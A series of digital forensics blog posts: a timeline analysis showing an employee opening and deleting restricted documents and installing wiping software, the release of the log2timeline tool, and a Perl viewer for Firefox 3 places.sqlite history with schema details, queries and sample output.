We then see that the user Joe has started some other activity on the machine.  At 15:19:20 we see that the Windows shortcut (LNK) file “C:/Documents and Settings/joe/Recent/Very secret document.lnk” was created.  This is one of the documents that we were supposed to look for, one of the documents that the user Joe was not supposed to examine.  The creation of this link indicates that the document had been opened by the user, so we examine the timeline further.  We see from the information found inside the link file that it points to “C:/Documents and Settings/Administrator/My Documents/Very secret document.txt”, which again strengthens our case, since this really does seem to be the document in question.  For further confirmation we see that the access time of this particular document was also updated at the same time as the other files were created.

We can then see from the UserAssist part of the timeline that the user Joe opened up NOTEPAD.EXE at 15:19:23 (the last time it was opened), and that the user had used this program twice.  At the same time, that is at 15:19:23 we also see that the document: “C:/Documents and Settings/joe/Recent/Not to be seen document.lnk” was created.  This is the other document that the HR department suspected Joe to open.  The information gathered from the LNK file indicates that this file points to the document “C:/Documents and Settings/Administrator/My Documents/Not to be seen document.txt”, suggesting that the user Joe opened this document as well (most likely using Notepad).  Then finally we see that the Prefetch file for NOTEPAD.EXE was created at 15:19:25, indicating that notepad had been run five times on the machine, last time at 15:19:23 (the same time that the documents were opened).

We see in the Prefetch file that Notepad had been opened five times, yet the UserAssist part of Joe’s registry indicates that he only opened it twice.  This indicates that other users must have used Notepad as well (the other three times).
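A side note on the UserAssist evidence: the value names under the UserAssist registry keys are ROT13-encoded, so a parser has to decode them before the executed program names become readable.  A minimal illustration (the value name shown is the well-known XP prefix UEME_RUNPIDL):

```python
import codecs

# UserAssist value names in NTUSER.DAT are ROT13-encoded;
# decoding reveals what was actually run by the user.
encoded = "HRZR_EHACVQY"          # as stored in the registry
decoded = codecs.decode(encoded, "rot_13")
print(decoded)                    # UEME_RUNPIDL
```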

At 15:19:26 we see that a new file has been created inside the recycle bin, a file called Dc1.txt.  To gain further information about this file we examine the recycle bin information inside the timeline.  We then see that (according to INFO2) the file “C:/Documents and Settings/Administrator/My Documents/Not to be seen document.txt” had been deleted at 15:19:29 (three seconds after the file Dc1.txt was created).  Since the file Dc1.txt was created inside the folder “C:/RECYCLER/S-1-5-21-…-1004” we can be fairly certain that the user with the RID 1004 (the RID is the last part of the SID, a unique ID for each user in Windows) deleted this file.  If we then examine the content of the SAM file (C:/WINDOWS/system32/config/SAM) with a tool such as RegRipper we see that the user joe has the user id 1004, suggesting that the user Joe deleted the file “Not to be seen document.txt”.  The picture below shows the timeline from this part:

Showing opened and deleted files
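Extracting the RID from a SID is simple string handling, since the RID is always the final hyphen-separated component.  A tiny sketch, using a hypothetical SID (the sub-authority values below are made up; only the trailing RID matters for the mapping):

```python
def rid_from_sid(sid: str) -> int:
    # The RID is the last hyphen-separated component of a SID
    return int(sid.rsplit("-", 1)[1])

# Hypothetical full SID of a RECYCLER sub-folder owner
folder_sid = "S-1-5-21-1111111111-2222222222-3333333333-1004"
print(rid_from_sid(folder_sid))  # 1004
```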

After this activity with the secret documents we see that the user Joe continued to use Firefox, now with clear indications that the user is in fact downloading wiping software (instead of just visiting sites containing a download section).  The user visits the URL “http://…..wipe3.exe” and the visit type is DOWNLOAD, indicating that a download is in fact taking place.

We can then further confirm this suspicion by examining the timeline right after the download took place.  We see that the file bcwipe3.exe was created at “C:/Documents and Settings/joe/My Documents/Niðurhal/bcwipe3.exe” (Niðurhal is the Icelandic word for download).  This further suggests that it was in fact the user Joe who downloaded the wiping software.

Downloading wiping software

We can then see indications that the wiping software was indeed installed on the machine from the filesystem timeline.

Installing wiping software

We can then see from the Prefetch file that the software BCWIPE3.EXE was run on the machine, further suggesting that the file the user Joe seems to have downloaded was indeed run.  We can also see temporary files created by the installation program inside Joe’s user directory, further indicating that the user Joe really installed the software in question (other temporary files belonging to bcwipe3.exe were created inside Joe’s folder as well).

Prefetch confirmation of installing wiping software

The final line in the timeline indicating that the user Joe installed the wiping software can be found inside the UserAssist part of the registry.  We can see that the user Joe ran the LNK file “BCWipe 3.0/BCWipe Task Manager.lnk”, indicating that he ran part of the software after installation (a task manager that comes with it).

User Joe installing Wiping software

To sum up this little example: by examining the timeline (using the artifacts inside it) we found that all of the following events took place on the 4th of August this year:

  • 15:13:43: Internet Explorer is started
  • 15:14:48: Internet Explorer is used by the user joe to visit the site “mozilla.org”
  • 15:14:49: Internet Explorer is used by the user joe to visit the site “download.mozilla.org”
  • 15:16:08: The browser Firefox is installed on the machine
  • 15:16:11: A Firefox user profile is created for the user joe
  • 15:16:56: Firefox browser is started
  • 15:17:00: User joe visits the start page of Firefox (using Firefox)
  • 15:17:43: User joe searches for “how to delete files”, using Google search engine
  • User joe then reads a few web pages which clearly give directions on how to delete files and folders
  • 15:18:27: User joe starts reading about tools that wipe files
  • 15:19:20: A shortcut file is created inside recent document history of user Joe, indicating that the file “Very secret document.txt” had been opened by the user
  • 15:19:23: The last time that the user Joe opened NOTEPAD.EXE
  • 15:19:23: A shortcut is created inside recent document history of user Joe, indicating that the file “Not to be seen document.txt” had been opened by the user joe
  • 15:19:26: The file Dc1.txt was created inside the recycle bin (inside a folder that belongs to the user joe).  This file used to be named “Not to be seen document.txt” before it was moved to the recycle bin
  • 15:19:37: Wiping software is downloaded from the Internet using Firefox (by the user Joe)
  • 15:21:16: The wiping software is installed, leaving temporary files inside Joe’s user directory, indicating that the user Joe is in fact the user that is installing the software
  • 15:21:44: The user Joe runs a program that belongs to the wiping software (UserAssist)

Although this case is very simple, and we managed to image the computer a few minutes after the alleged breach of policy, we can clearly see that correlating different information found inside log files and other OS artifacts can prove to be very helpful in our investigations, and at least point us to data that we need to examine using other techniques.

Artifact Timeline Creation and Analysis – Tool Release: log2timeline

Using timeline analysis during investigations can be extremely useful, yet it sometimes misses important events that are stored inside files on the suspect system (log files, OS artifacts).  By depending solely on the traditional filesystem timeline you may miss context that is necessary to get a complete picture of what really happened.  So to get “the big picture”, or a complete and accurate description, we need to dig deeper and incorporate information found inside artifacts or log files into our timeline analysis.  These artifacts or log files could reside on the suspect system itself or on another device, such as a firewall or a proxy (or any other device that logs information that might be relevant to the investigation).

Unfortunately there are few tools out there that can parse the various artifacts found on different operating systems and produce body files to include with traditional filesystem analysis.  A version of mactime first appeared in The Coroner’s Toolkit (TCT) by Dan Farmer, followed later by Rob Lee’s mac-daddy.  Harlan Carvey has been working on scripts for the Windows platform to accomplish this, such as regtime.pl, which creates a body file from the registry.  Usually these tools are built to parse a single file or artifact of a particular format (such as a tool just to produce a body file from restore points); I have released some tools like that myself, as have H. Carvey and others.  I know of one attempt to create a framework that correlates different artifacts into a timeline: a project called Ex-Tip, by Mike Cloppert.  There is a GCFA gold paper describing the framework as well as a blog post on the SANS blog.  That project was started in May 2008, but unfortunately has not been maintained since then.  Instead of extending that project I decided to start my own, that is, to build a tool that can correlate information found inside different log files and artifacts with traditional timeline analysis.  The idea with this tool is to create a framework that can be easily extended with new log parsers or new output plugins.  For the framework to be useful I wanted to be able to integrate it easily with existing timeline analysis tools, so I chose to implement an output plugin that produces timelines in the mactime body format, to be used with the mactime tool from TSK (The Sleuth Kit).  This tool is called log2timeline and already supports incorporating 12 different log files/artifacts into the timeline:

  • Prefetch directory (reads the content of the directory and parses files found inside)
  • UserAssist key info (reads the NTUSER.DAT user registry file to parse the content of UserAssist keys)
  • Squid access logs (with emulate_httpd_log off)
  • Restore points (reads the content of the directory and parses rp.log file inside each restore point)
  • Windows shortcut files (LNK)
  • Firefox 3 history file (places.sqlite)
  • Windows Recycle Bin (INFO2)
  • Windows IIS W3C log files
  • OpenXML Metadata (for metadata inside Office 2007 documents)
  • ISA Server text export from queries (saved to clipboard and from there to a text file)
  • TLN (Timeline) body file
  • Mactime body file (so it can be output in a different format)
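An output plugin’s job is essentially to render each parsed event as one line of the chosen output format.  The sketch below shows the general shape for the TSK 3.x mactime body format; which fields log2timeline actually zeroes, and how it labels events, is an assumption here, not taken from the tool’s source:

```python
def to_bodyline(name: str, timestamp: int) -> str:
    # TSK 3.x body format, pipe-delimited:
    # MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime
    # Fields that do not apply to a log-derived event are zeroed; the single
    # event time is repeated in all four time slots for simplicity.
    t = str(timestamp)
    return "|".join(["0", name, "0", "0", "0", "0", "0", t, t, t, t])

# Hypothetical event: a Firefox history entry rendered as a body line
line = to_bodyline("[Firefox 3] URL visited http://www.google.is/", 1249399020)
print(line)
```

mactime then sorts such lines from all sources into a single chronological view, which is what makes the correlation possible.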

To show an example of the usage of the tool, let’s follow this scenario:

You are working for corporation X.  You have been approached by a member of the HR team as well as the legal team.  You are asked to examine the workstation of one of the employees, a man named Joe.  He is suspected of reading documents that he is not allowed to read (documents named “Very secret document.txt” and “Not to be seen document.txt”), as well as of deleting one of those documents.  He may also have installed wiping software on his machine.  According to corporate policy, users are not allowed to install software on their machines (although they have the rights to do so, as they are members of the Administrator group on their workstations), and Internet Explorer is the only allowed browser.

First of all you need to start thinking about this particular case, that is:

  • What are you asked to find? (what questions to answer)
  • What data do you need to examine to answer those questions?
  • How do we extract that data?
  • What does that data tell you?

So for this particular case we have the following.  We are asked to answer these questions:

  • Did the user Joe read the documents “Very secret document.txt” and “Not to be seen document.txt”?
  • Did the user Joe delete one of those documents?
  • Did the user Joe install software designed to wipe documents?

Next we need to find out what data we need to extract to get that information, as well as to ask ourselves what that data tells us.  For this particular case we would need the following (at least to begin with):

  • Examine the MACB times of the documents in question (they are stored inside the “My Documents” folder of the user Administrator).  Since we know, from talking to the Administrator, that he has not logged on to the machine since the alleged policy violation occurred, the last access time of the documents might indicate that someone else read them.
  • Examine timeline of the user Joe.  This could tell us what the user was doing on the day in question (4th of August)
  • Extract information found inside the Windows Prefetch folder.  This could tell us the last time a particular piece of software was started, possibly indicating that wiping software had been used, or software to read the text documents in question
  • Examine the Recycle Bin for deleted documents.  It is possible that the document that is suspected of being deleted still sits in the Recycle Bin
  • Examine deleted documents from the unallocated space.  See if we can find traces of the file on the unallocated space of the hard drive, indicating that it had been deleted.
  • Examine the web history of user Joe.  There is a suspicion that he installed wiping software, so examining the web history could lead us to such activity
  • Examine the Windows shortcut files that are created inside the Recent Documents folder of the user Joe.  This folder contains shortcut (LNK) files that point to the documents last opened by the user, possibly indicating that the user Joe opened the documents in question (if he did not delete the shortcut files after the fact).
  • Examine the registry file of the user Joe.  The registry contains a wealth of information, so examining it could give us clues about the behavior of the user Joe.
  • And most likely some other sources, such as the system registry, event logs, etc.

Tomorrow we will explore this particular hypothetical case in more detail, using the tool log2timeline to create a timeline and analyze it.

Firefox 3 History

Analysis of browser history almost always comes up, no matter what is being investigated.  And despite Firefox being one of the most popular browsers in current use, there are not many tools out there that can read and display its history (at least in a human-readable format).  There are tools such as f3e from FirefoxForensics.com; however that tool, just like the others I have found, is only distributed as an EXE running on Windows (and no source code is provided).

Traditionally Firefox stored its history in the Mork file format, which could be read using any standard editor.  The new version, version 3, which has been out for quite some time now, uses a different method of storing user history.  The history is stored in the MozStorage format, as a SQLite database (see description here) in a file called places.sqlite.  The tables can be easily read using sqlite3, for instance:

sqlite3 places.sqlite ".tables"
moz_anno_attributes  moz_favicons         moz_keywords
moz_annos            moz_historyvisits    moz_places
moz_bookmarks        moz_inputhistory
moz_bookmarks_roots  moz_items_annos

There are two tables of particular interest: moz_places and moz_historyvisits.  The schema for these tables can also be easily extracted using sqlite3:

sqlite3 places.sqlite ".schema moz_places"
CREATE TABLE moz_places (
id INTEGER PRIMARY KEY,
url LONGVARCHAR,
title LONGVARCHAR,
rev_host LONGVARCHAR,
visit_count INTEGER DEFAULT 0,
hidden INTEGER DEFAULT 0 NOT NULL,
typed INTEGER DEFAULT 0 NOT NULL,
favicon_id INTEGER,
frecency INTEGER DEFAULT -1 NOT NULL);
CREATE INDEX moz_places_faviconindex ON moz_places (favicon_id);
CREATE INDEX moz_places_frecencyindex ON moz_places (frecency);
CREATE INDEX moz_places_hostindex ON moz_places (rev_host);
CREATE UNIQUE INDEX moz_places_url_uniqueindex ON moz_places (url);
CREATE INDEX moz_places_visitcount ON moz_places (visit_count);

And for moz_historyvisits:

sqlite3 places.sqlite ".schema moz_historyvisits"
CREATE TABLE moz_historyvisits (
id INTEGER PRIMARY KEY,
from_visit INTEGER,
place_id INTEGER,
visit_date INTEGER,
visit_type INTEGER,
session INTEGER);
CREATE INDEX moz_historyvisits_dateindex ON moz_historyvisits (visit_date);
CREATE INDEX moz_historyvisits_fromindex ON moz_historyvisits (from_visit);
CREATE INDEX moz_historyvisits_placedateindex ON moz_historyvisits (place_id, visit_date);
CREATE TRIGGER moz_historyvisits_afterdelete_v1_trigger
AFTER DELETE ON moz_historyvisits FOR EACH ROW
WHEN OLD.visit_type NOT IN (0,4,7)
BEGIN UPDATE moz_places SET visit_count = visit_count - 1
WHERE moz_places.id = OLD.place_id
AND visit_count > 0; END;
CREATE TRIGGER moz_historyvisits_afterinsert_v1_trigger
AFTER INSERT ON moz_historyvisits FOR EACH ROW
WHEN NEW.visit_type NOT IN (0,4,7)
BEGIN UPDATE moz_places SET visit_count = visit_count + 1
WHERE moz_places.id = NEW.place_id; END;

According to the FirefoxForensics.com web site, the explanation of each of the keys found in moz_places is roughly the following:

  • id INTEGER PRIMARY KEY: the primary key of the table, of no real interest
  • url LONGVARCHAR: the URL that was visited, including the protocol used; something one likes to examine
  • title LONGVARCHAR: the title of the page as it appears in the browser
  • rev_host LONGVARCHAR: the reverse of the host name that was visited, used to ease searching and querying for hosts visited in the history file
  • visit_count INTEGER DEFAULT 0: as the name implies, a visit counter for the site
  • hidden INTEGER DEFAULT 0 NOT NULL: either 0 or 1; if the URL is hidden the user did not navigate directly to it, which usually indicates an embedded page using something like an iframe
  • typed INTEGER DEFAULT 0 NOT NULL: indicates whether the user typed the URL directly into the location bar
  • favicon_id INTEGER: a relationship to another table containing favicons
  • frecency INTEGER DEFAULT -1 NOT NULL: a combination of frequency and recency, used to calculate which sites appear at the top of the suggestion list when URLs are typed into the address bar
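The timestamp itself lives in moz_historyvisits: the visit_date column is a PRTime value, i.e. microseconds since the Unix epoch (1970-01-01 00:00:00 UTC), so converting it to a readable date is a simple division:

```python
from datetime import datetime, timezone

def prtime_to_datetime(visit_date: int) -> datetime:
    # moz_historyvisits.visit_date is PRTime:
    # microseconds since 1970-01-01 00:00:00 UTC
    return datetime.fromtimestamp(visit_date / 1_000_000, tz=timezone.utc)

# 1245921377000000 microseconds -> Thu Jun 25 09:16:17 2009 UTC
print(prtime_to_datetime(1245921377000000))
```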

Since we know the structure and the meaning of each key in the database, it is simple to create a script that parses the database and displays the content as we wish.  The Perl script I wrote is called ff3histview and can be found here.  It reads the places.sqlite database and displays its content in a human-readable format.  The usage of the script is the following:

ff3histview [--help|-?|-help]
This screen
ff3histview [-t TIME] [-csv|-txt|-html] [-s|--show-hidden] [-o|--only-typed] [-quiet]    places.sqlite
     -t Defines a time skew if the places.sqlite came from a computer with an incorrect time setting.  The format of the
        variable TIME is: X | Xs | Xm | Xh
       where X is an integer and s represents seconds, m minutes and h hours (default behaviour is seconds)
     -quiet Does not ask questions about case number and reference (default with CSV output)
     -csv|-txt|-html The output of the file.  TXT is the default behaviour and is chosen if none of the others is chosen
     -s or --show-hidden displays the "hidden" URLs as well as others.  These URL's represent URLs that the user
       did not specifically navigate to.
     -o or --only-typed Only show URLs that the user typed directly into the location/URL bar.

     places.sqlite is the SQLITE database that contains the web history in Firefox 3.  It should be located at:
           [win xp] c:\Documents and Settings\USER\Application Data\Mozilla\Firefox\Profiles\PROFILE\places.sqlite
           [linux] /home/USER/.mozilla/firefox/PROFILE/places.sqlite
           [mac os x] /Users/USER/Library/Application Support/Firefox/Profiles/PROFILE/places.sqlite

The default behaviour of the script is to extract all URLs from moz_places that are not hidden (this can be changed using parameters to the script, for example to only see URLs the user typed in).  A hidden URL, according to firefoxforensics.com, is a URL “that the user did not specifically navigate to. These are commonly embedded pages, i-frames, RSS bookmarks and javascript calls.”[1] So the SQL statement that the script executes is:

SELECT moz_historyvisits.id,url,title,visit_count,visit_date,from_visit,rev_host
FROM moz_places, moz_historyvisits
WHERE
 moz_places.id = moz_historyvisits.place_id
 AND hidden = 0

This is in fact a really simple SQL statement, just extracting the URLs and some other information of value.  The “from_visit” column refers to the URL that the user navigated from; relevant information about those nodes is extracted as well, giving the investigator more context.
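The same query can be run programmatically.  The sketch below builds a minimal two-table database (a trimmed version of the schema above, with one hypothetical sample row) and executes the join, just to show the shape of the result:

```python
import sqlite3

# In-memory database with a trimmed places.sqlite schema
con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url LONGVARCHAR,
    title LONGVARCHAR, rev_host LONGVARCHAR,
    visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL);
CREATE TABLE moz_historyvisits (id INTEGER PRIMARY KEY,
    from_visit INTEGER, place_id INTEGER, visit_date INTEGER);
INSERT INTO moz_places VALUES
    (1, 'http://isc.sans.org/', 'ISC', 'gro.snas.csi.', 1, 0);
INSERT INTO moz_historyvisits VALUES (1, 0, 1, 1245874793000000);
""")
rows = con.execute("""
    SELECT moz_historyvisits.id, url, title, visit_count,
           visit_date, from_visit, rev_host
    FROM moz_places, moz_historyvisits
    WHERE moz_places.id = moz_historyvisits.place_id
      AND hidden = 0
""").fetchall()
print(rows)
```

Each returned row corresponds to one visit; joining on place_id is what lets a single URL appear once per visit with its own timestamp.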

The script can output in text format, in CSV (Comma Separated Values) for spreadsheet manipulation, and as an HTML page.  An example of usage (standard default behavior, without asking questions about case details):

ff3histview -q  places.sqlite
Firefox 3 History Viewer
Not showing 'hidden' URLS, that is URLs that the user did not specifically navigate to, use -s to show them
Date of run (GMT): 13:7:9, Thu Jul 2, 2009
Time offset of history file: 0 s
-------------------------------------------------------
Date                Count    Host name    URL    notes
Thu Jun 25 09:16:17 2009    1    www.regripper.net    http://www.regripper.net/
Wed Jun 24 20:19:53 2009    1    isc.sans.org    http://isc.sans.org/
Thu Jun 25 12:43:14 2009    1    snort.org    http://snort.org/
Thu Jun 25 12:43:09 2009    2    www.snort.org    http://www.snort.org/
Thu Jun 25 12:53:51 2009    2    www.snort.org    http://www.snort.org/    From: http://www.snort.org/news
Thu Jun 25 12:48:09 2009    1    www.snort.org    http://www.snort.org/news    From: http://www.snort.org/
Thu Jun 25 18:38:35 2009    1    www.groklaw.net    http://www.groklaw.net/    From:
-------------------------------------------------------

And if there are any discrepancies between the time settings of the investigator’s machine and the suspect’s:

ff3histview -q -t 14380  places.sqlite
Firefox 3 History Viewer
Not showing 'hidden' URLS, that is URLs that the user did not specifically navigate to, use -s to show them
Date of run (GMT): 13:8:34, Thu Jul 2, 2009
Time offset of history file: 14380 s
-------------------------------------------------------
Date                Count    Host name    URL    notes
Thu Jun 25 13:15:57 2009    1    www.regripper.net    http://www.regripper.net/
Thu Jun 25 00:19:33 2009    1    isc.sans.org    http://isc.sans.org/
Thu Jun 25 16:42:54 2009    1    snort.org    http://snort.org/
Thu Jun 25 16:42:49 2009    2    www.snort.org    http://www.snort.org/
Thu Jun 25 16:53:31 2009    2    www.snort.org    http://www.snort.org/    From: http://www.snort.org/news
Thu Jun 25 16:47:49 2009    1    www.snort.org    http://www.snort.org/news    From: http://www.snort.org/
Thu Jun 25 22:38:15 2009    1    www.groklaw.net    http://www.groklaw.net/    From:
-------------------------------------------------------
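The -t offset is plain second arithmetic: 14380 seconds is 3 h 59 m 40 s, so every displayed time is shifted by that amount (09:16:17 in the first run becomes 13:15:57 here).  Verifying one entry:

```python
from datetime import datetime, timedelta, timezone

skew = timedelta(seconds=14380)          # 3 h 59 m 40 s
# First entry of the unadjusted run: Thu Jun 25 09:16:17 2009
original = datetime(2009, 6, 25, 9, 16, 17, tzinfo=timezone.utc)
adjusted = original + skew
print(adjusted.strftime("%H:%M:%S"))     # 13:15:57
```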

And if we want to include “hidden” URLs:

ff3histview -q -t 14380 -s places.sqlite
Firefox 3 History Viewer
Showing hidden URLs as well

Date of run (GMT): 13:14:58, Thu Jul 2, 2009
Time offset of history file: 14380 s

-------------------------------------------------------
Date                Count    Host name    URL    notes
Thu Jun 25 13:15:57 2009    1    www.regripper.net    http://www.regripper.net/
Thu Jun 25 00:19:33 2009    1    isc.sans.org    http://isc.sans.org/
Thu Jun 25 00:19:36 2009    0    www.sans.org    http://www.sans.org/banners/isc.php    From: http://isc.sans.org/
Thu Jun 25 06:14:16 2009    0    www.sans.org    http://www.sans.org/banners/isc.php    From: http://isc.sans.org/
Thu Jun 25 15:01:07 2009    0    www.sans.org    http://www.sans.org/banners/isc.php    From: http://isc.sans.org/
Thu Jun 25 06:19:18 2009    0    www.sans.org    http://www.sans.org/banners/isc_ss.php    From:
Thu Jun 25 15:58:20 2009    0    www.sans.org    http://www.sans.org/banners/isc_ss.php    From:
Thu Jun 25 13:15:57 2009    0    www.regripper.net    http://www.regripper.net/links.htm    From: http://www.regripper.net/
Thu Jun 25 13:15:57 2009    0    www.regripper.net    http://www.regripper.net/main.htm    From: http://www.regripper.net/
Thu Jun 25 13:16:13 2009    0    www.regripper.net    http://www.regripper.net/RegRipper/    From: http://www.regripper.net/links.htm
Thu Jun 25 13:16:17 2009    0    www.regripper.net    http://www.regripper.net/RegRipper/RegRipper/    From: http://www.regripper.net/RegRipper/
Thu Jun 25 13:16:28 2009    0    regripper.invisionplus.net    http://regripper.invisionplus.net/    From: http://www.regripper.net/links.htm
Thu Jun 25 16:42:54 2009    1    snort.org    http://snort.org/    From: http://www.regripper.net/links.htm
Thu Jun 25 16:42:49 2009    2    www.snort.org    http://www.snort.org/    From: http://www.regripper.net/links.htm
Thu Jun 25 16:53:31 2009    2    www.snort.org    http://www.snort.org/    From: http://www.snort.org/news
Thu Jun 25 16:47:49 2009    1    www.snort.org    http://www.snort.org/news    From: http://www.snort.org/
Thu Jun 25 22:38:15 2009    1    www.groklaw.net    http://www.groklaw.net/    From:
-------------------------------------------------------

And for the HTML output:

ff3histview  -t 14380 --html places.sqlite
History HTML

Kristinn Guðjónsson, GCFA #5028, works as a forensic analyst and incident handler as well as being a local mentor for SANS.